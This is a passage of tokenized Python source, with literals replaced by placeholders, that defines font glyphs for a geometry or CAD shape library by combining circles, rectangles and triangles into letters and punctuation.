<NUM_LIT> , - <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , - <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT:0.1> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape . 
width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:g>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.5> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:H>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:h>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:0> , <NUM_LIT:0.1> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT:0.5> <EOL> _glyphs [ '<STR_LIT:I>' ] = shape <EOL> shape = rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . 
width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:i>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = circle ( <NUM_LIT:0.0> , - <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT:0.0> , - <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT:0.1> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , - <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape -= triangle ( <NUM_LIT:0.1> , <NUM_LIT:1> , <NUM_LIT:0.5> , <NUM_LIT:1> , <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT:0.5> , <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.5> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape -= triangle ( <NUM_LIT:0.1> , <NUM_LIT:1> , <NUM_LIT:0.5> , <NUM_LIT:1> , <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:0.5> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT:0.1> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0.5> ) <EOL> shape . 
width = <NUM_LIT:0.5> <EOL> _glyphs [ '<STR_LIT:k>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0.1> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:L>' ] = shape <EOL> shape = rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:l>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += triangle ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0.1> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:M>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape . 
width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:m>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += triangle ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0.1> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0.5> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:N>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:n>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:O>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . 
width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:o>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:P>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , - <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:p>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += triangle ( <NUM_LIT:0.5> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT:0.5> , <NUM_LIT:0.1> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ) <EOL> shape . 
width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:q>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:R>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) - scale_x ( circle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape = scale_x ( shape , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:r>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += reflect_x ( reflect_y ( shape , <NUM_LIT:0.5> ) , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:S>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= scale_x ( circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += reflect_x ( reflect_y ( shape , <NUM_LIT> ) , <NUM_LIT> ) <EOL> shape = scale_x ( shape , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape . 
width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:s>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) + rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:T>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:t>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += rectangle ( <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:u>' ] = shape <EOL> shape = triangle ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0.1> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += reflect_x ( shape , <NUM_LIT> ) <EOL> shape . 
width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = triangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += reflect_x ( shape , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:v>' ] = shape <EOL> shape = triangle ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0.1> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += reflect_x ( shape , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = triangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:0.5> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += reflect_x ( shape , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:w>' ] = shape <EOL> shape = triangle ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += reflect_x ( shape , <NUM_LIT> ) <EOL> shape . 
width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:X>' ] = shape <EOL> shape = triangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += reflect_x ( shape , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:x>' ] = shape <EOL> shape = triangle ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0.1> , <NUM_LIT:1> , <NUM_LIT> , <NUM_LIT:0.5> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape += reflect_x ( shape , <NUM_LIT> ) <EOL> shape += rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0.5> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:Y>' ] = shape <EOL> shape = triangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> ) <EOL> shape += triangle ( <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape += reflect_x ( shape , <NUM_LIT> ) + move ( reflect_x ( shape , <NUM_LIT> ) , - <NUM_LIT> , - <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:y>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape -= triangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . 
width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:z>' ] = shape <EOL> shape = MathTree . Constant ( <NUM_LIT:1> ) <EOL> shape . bounds = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , None , None , None ] <EOL> shape . shape = True <EOL> shape . width = <NUM_LIT> <EOL> shape . xmin , shape . xmax = <NUM_LIT:0> , <NUM_LIT> <EOL> shape . ymin , shape . ymax = <NUM_LIT:0> , <NUM_LIT:1> <EOL> _glyphs [ '<STR_LIT:U+0020>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape = scale_y ( shape , <NUM_LIT> , <NUM_LIT:3> ) <EOL> shape &= rectangle ( <NUM_LIT:0.0> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.0> , - <NUM_LIT> , - <NUM_LIT:0.5> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:U+002C>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:.>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT:0.1> <EOL> _glyphs [ "<STR_LIT:'>" ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) + rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:">' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) + circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . 
width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT::>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape = scale_y ( shape , <NUM_LIT> , <NUM_LIT:3> ) <EOL> shape &= rectangle ( <NUM_LIT:0.0> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ) <EOL> shape -= triangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.0> , - <NUM_LIT> , - <NUM_LIT:0.5> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape += circle ( <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:;>' ] = shape <EOL> shape = rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape += circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT:0.1> <EOL> _glyphs [ '<STR_LIT:!>' ] = shape <EOL> shape = rectangle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:->' ] = shape <EOL> shape = circle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> ) - scale_x ( circle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0.5> ) , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape = scale_x ( shape , <NUM_LIT:0> , <NUM_LIT:1> / <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:)>' ] = shape <EOL> shape = circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) - scale_x ( circle ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.5> ) , <NUM_LIT> , <NUM_LIT> ) <EOL> shape &= rectangle ( <NUM_LIT:0> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT:1> ) <EOL> shape = scale_x ( shape , <NUM_LIT:0> , <NUM_LIT:1> / <NUM_LIT> ) <EOL> shape . width = <NUM_LIT> <EOL> _glyphs [ '<STR_LIT:(>' ] = shape <EOL> shape = rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> shape -= circle ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT> ) <EOL> shape -= rectangle ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> ) <EOL> shape . 
